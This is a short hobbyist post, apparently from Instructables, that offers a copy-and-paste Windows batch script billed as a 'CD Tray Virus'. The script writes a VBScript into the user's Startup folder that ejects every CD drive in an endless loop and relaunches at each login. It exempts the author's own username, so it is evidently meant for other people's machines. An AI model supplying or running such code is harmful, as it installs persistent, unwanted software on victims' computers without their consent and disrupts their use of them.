CD Tray Virus

by nkarssen in Circuits > Software

125 Views, 0 Favorites, 0 Comments

CD Tray Virus

14, 12:19 AM.jpg
I'm going to show you how to make a virus that opens and closes your CD tray and never stops doing that not even if you restart your computer :D

Code

Here is the code just copy and paste
save as "whatyouwant".bat

if %username%== "YOUR USERNAME!" exit
set a=C:\"Users\%username%\Start Menu\Startup\HMDCD.vbs"
echo Set oWMP = CreateObject("WMPlayer.OCX.7") >> %a%
echo Set colCDROMs = oWMP.cdromCollection >> %a%
echo do >> %a%
echo For i = 0 to colCDROMs.Count -1 >> %a%
echo colCDROMs.Item(i).Eject >> %a%
echo Next >> %a%
echo loop >> %a%
echo oWMP.close >> %a%
start %a%